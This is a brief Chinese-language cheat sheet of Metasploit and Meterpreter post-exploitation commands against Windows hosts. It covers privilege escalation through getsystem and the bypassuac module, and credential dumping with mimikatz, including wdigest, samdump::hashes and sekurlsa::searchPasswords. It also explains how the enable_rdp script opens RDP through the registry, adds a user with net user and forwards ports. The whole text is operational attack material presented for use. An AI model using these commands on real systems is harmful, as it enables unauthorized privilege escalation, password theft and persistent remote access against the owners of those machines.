getuid 当前用户 getsystem 提权 bypassuac 提权 显示会话 sessions -i 进入一个会话 session -i 1 load mimikatz 获取帐号密码 wdigest 获取密码 mimikatz_command -f samdump::hashes 取得原始加密密码 mimikatz_command -f sekurlsa::searchPasswords
use exploit/windows/local/bypassuac set SESSION 2 run脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb 通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令